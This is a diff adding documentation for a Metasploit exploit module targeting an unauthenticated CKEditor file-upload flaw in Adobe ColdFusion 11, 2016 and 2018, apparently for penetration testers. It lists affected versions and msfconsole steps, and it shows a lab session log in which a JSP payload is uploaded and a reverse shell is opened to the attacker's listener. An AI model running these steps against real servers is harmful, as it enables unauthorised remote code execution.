diff --git a/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md b/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md new file mode 100644 index 0000000000..449b5fc420 --- /dev/null +++ b/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md @@ -0,0 +1,51 @@ +## Description + +A file upload vulnerability in the CKEditor of Adobe ColdFusion 11 +(Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and +ColdFusion 2018 (July 12 release) allows unauthenticated remote +attackers to upload and execute JSP files through the filemanager +plugin. Tested on Adobe ColdFusion 2018 v2018.0.0.310739. + +## Vulnerable Application + +ColdFusion 11 (Update 14 and earlier), +ColdFusion 2016 (Update 6 and earlier), and +[ColdFusion 2018 (July 12 release)](https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0) + + +## Verification Steps + +1. `./msfconsole -q` +2. `use exploit/multi/http/coldfusion_ckeditor_file_upload` +3. `set rhosts ` +4. `set lhost ` +5. `exploit` +6. Get a shell + + +## Scenarios + +### Tested on Coldfusion 2018 v2018.0.0.310739 + +``` + +msf5 > use exploit/multi/http/coldfusion_ckeditor_file_upload +msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142 +rhosts => 172.22.222.142 +msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set lhost 172.22.222.136 +lhost => 172.22.222.136 +msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > exploit + +[*] Started reverse TCP handler on 172.22.222.136:4444 +[*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/ASMK.jsp... +[+] Upload succeeded! Executing payload... +[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.142:43262) at 2019-01-10 06:30:52 -0600 + +whoami +cfuser +uname -a +Linux 6bd4238e7ffb 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux +exit +[*] 172.22.222.142 - Command shell session 1 closed. +msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > +```